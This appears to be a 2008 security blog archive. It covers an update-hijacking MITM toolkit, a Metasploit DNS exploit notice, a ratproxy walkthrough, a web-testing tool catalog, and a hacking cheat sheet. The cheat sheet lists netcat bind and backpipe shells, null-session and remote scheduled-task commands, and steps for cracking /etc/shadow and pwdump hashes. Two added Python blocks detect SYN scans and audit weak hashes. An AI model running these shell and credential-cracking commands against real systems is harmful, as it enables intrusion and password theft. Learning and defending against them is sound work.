Demo video available!
A toolkit for exploiting products which perform online updates. (MITM attack is required here!)
The demo will show us how to "exploit" Sun Java updates, using the recent DNS flaw (exploits available in Metasploit) for the MITM attack.
Tuesday, July 29, 2008
Saturday, July 26, 2008
Exploit for Dan's DNS bug goes online!
It's now available in Metasploit
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
So, update your DNS Server now!
Sunday, July 6, 2008
ratproxy - another web application security tool
ratproxy - [BETA] a semi-automated web application security tool which allows you to analyse problems such as XSS, insufficient CSRF defenses, caching issues, and much more while browsing the site.
Step 1: Run the tool and only capture domain "arlinz.blogspot.com"
$ ./ratproxy -v arlinz.dir -w arlinz.file -d arlinz.blogspot.com -lextifscgjm
ratproxy version 1.51-beta by
[*] Proxy configured successfully. Have fun, and please do not be evil.
[+] Accepting connections on port 8080/tcp (local only)...
Step 2: Point your browser's proxy to "localhost:8080" and start browsing
Step 3: Generate the report
$ ./ratproxy-report.sh arlinz.file > report.htm
Step 4: Review the report
Some reports from other sites:
Saturday, July 5, 2008
Hacking Cheat Sheet
####################
# Reconnaissance #
####################
---------------------
- DNS Zone Transfer -
---------------------
Windows: nslookup
server [DNS SERVER]
ls -d [domain.net]
UNIX: dig @[DNS SERVER] [domain.net] -t AXFR
####################
# Scanning #
####################
--------
- NMAP -
--------
# nmap -sS -sV -O -PI [IP Address/Range]
-sS (SYN Stealth Scan)
-sV (Version Probe)
-O (OS Detection)
-PI (Ping target - ICMP Echo to check if server alive)
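A defender's counterpart to the scan above, added here as an example (not part of the original cheat sheet): it runs over constructed iptables-style log lines and flags a source that sends bare SYNs to many distinct ports on one host within a short window, which is exactly the footprint a half-open -sS sweep leaves. The log format, the 10-port/60-second thresholds and the addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Simplified iptables-style record (constructed format, see _line below)
LOG_RE = re.compile(r"^(?P<ts>\S+) .*SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*"
                    r"PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+) .*\b(?P<flags>SYN|ACK)\b")

def parse_line(line):
    """Return the fields a scan detector needs, or None for non-TCP lines."""
    m = LOG_RE.search(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "dpt": int(m["dpt"]), "flags": m["flags"]}

def find_syn_scanners(lines, window=timedelta(seconds=60), min_ports=10):
    """Map source IP -> distinct ports probed, for sources that sent bare SYNs
    to at least min_ports distinct ports on one host inside `window`."""
    probes = defaultdict(list)                 # (src, dst) -> [(ts, dpt)]
    for line in lines:
        ev = parse_line(line)
        if ev and ev["flags"] == "SYN":        # -sS leaves only half-open SYNs
            probes[(ev["src"], ev["dst"])].append((ev["ts"], ev["dpt"]))
    hits = {}
    for (src, _dst), evs in probes.items():
        evs.sort()
        lo = 0                                 # sliding window over time order
        for hi in range(len(evs)):
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            ports = {dpt for _, dpt in evs[lo:hi + 1]}
            if len(ports) >= min_ports:
                hits[src] = max(hits.get(src, 0), len(ports))
    return hits

def _line(ts, src, dpt, flags):
    return (f"{ts} gw kernel: IN=eth0 OUT= SRC={src} DST=192.0.2.10 LEN=60 "
            f"PROTO=TCP SPT=40000 DPT={dpt} WINDOW=1024 {flags} URGP=0")

# Constructed sample: 198.51.100.7 probes 12 ports in 12 s; 203.0.113.5 is a
# normal client that completes handshakes to 80 and 443.
SAMPLE_LOG = [_line(f"2008-07-29T10:00:{i:02d}", "198.51.100.7", p, "SYN")
              for i, p in enumerate([21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389])]
SAMPLE_LOG += [_line(f"2008-07-29T10:00:{i:02d}", "203.0.113.5", p, f)
               for i, (p, f) in enumerate([(80, "SYN"), (80, "ACK"), (443, "SYN"), (443, "ACK")], 5)]
```

Lowering the window or raising min_ports trades sensitivity to slow scans against false positives from busy legitimate clients.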
-----------------
- Windows - Net -
-----------------
> net use \\hostname "" /U:""
> net use
> net sessions
> net view \\hostname
> net use * /del
> net time \\hostname
> net use * \\hostname\c$ [password] /u:[domain\userid]
####################
# Exploiting #
####################
----------
- NetCat -
----------
> nc -l -p [PORT NO]
> nc [HOST IP] [PORT NO]
> nc -l -p [PORT NO] -e cmd.exe (on UNIX: -e /bin/sh)
> nc -l -p [SOURCE PORT NO] 0backpipe (create backpipe with 'mknod backpipe p')
----------------------
- Windows SC command -
----------------------
> net start -> lists all started services
> sc \\hostname start schedule
> sc \\hostname start
> at \\hostname [time in A/P format] [run command]
> (VISTA ONLY!) schtasks /create /s [target IP] /ru "system" /sc once /st 20:45:00 /sd mm/dd/yyyy /tn [program name] /tr [full path with program name]
-----------------------
- Password Crack UNIX -
-----------------------
# unshadow /etc/passwd /etc/shadow > /tmp/combined
# john /tmp/combined
--------------------------
- Password Crack WINDOWS -
--------------------------
# use pwdump3 or fgdump
# crack with John the Ripper or Cain & Abel
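As an added example (not from the original post) covering both password-crack sections above: it audits /etc/shadow and pwdump-style records for what makes them quick work for John, namely DES or MD5 crypt, empty password fields, and real LM hashes. The sample records are constructed, the prefix table follows crypt(3) conventions, and the only real constant is the LM hash of the empty password.

```python
import re
# crypt(3) prefix -> scheme; anything outside STRONG is worth flagging
PREFIXES = {"$1$": "md5crypt", "$2b$": "bcrypt", "$5$": "sha256crypt",
            "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}
STRONG = {"bcrypt", "sha256crypt", "sha512crypt", "scrypt", "yescrypt"}
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty password

def classify_crypt(field):
    if field == "":
        return "empty"                  # no password at all
    if field[0] in "!*":
        return "locked"                 # disabled account, nothing to crack
    for prefix, name in PREFIXES.items():
        if field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "descrypt"               # legacy DES crypt: 8-char max, 12-bit salt
    return "unknown"

def audit_shadow(lines):
    """Return [(user, scheme)] for accounts john would get through quickly."""
    findings = []
    for line in lines:
        user, field = line.split(":")[:2]
        scheme = classify_crypt(field)
        if scheme not in STRONG and scheme != "locked":
            findings.append((user, scheme))
    return findings

def audit_pwdump(lines):
    """Return users whose pwdump/fgdump record (user:rid:LM:NT:::) still
    carries a real LM hash; LM is case-insensitive, split into 7-char halves."""
    weak = []
    for line in lines:
        user, _rid, lm = line.split(":")[:3]
        if re.fullmatch(r"[0-9a-fA-F]{32}", lm) and lm.lower() != EMPTY_LM:
            weak.append(user)
    return weak

# Constructed sample records (no real credentials), one per situation
SHADOW = [
    "root:$6$saltsalt$Qx9fakeSha512cryptDigestValue.ForDemoOnly:14000:0:99999:7:::",
    "legacy:abJnggxhB/yWI:14000:0:99999:7:::",
    "old:$1$abcdefgh$0123456789abcdefghijkl:14000:0:99999:7:::",
    "svc::14000:0:99999:7:::",
    "daemon:*:14000:0:99999:7:::",
]
PWDUMP = [
    "Administrator:500:" + EMPTY_LM + ":0123456789abcdef0123456789abcdef:::",
    "bob:1001:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::",
]
```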
Tuesday, January 8, 2008
WebApp Security Testing Catalog
Yet another (if there are any) Web application security testing tools catalog [beta version].
The main idea is to provide a catalog of Web application security tools (something like FireCAT)
[Beta Version] includes list of:
- Scanners (commercial and free)
- Proxy
- SQL Injection
- HTTP Header
- Session Management
- AJAX
- Flash
- Java Applet
- Browser
[To be added in future release]:
- Source code analysis (commercial and free)
- .Net/ASP
- Web Services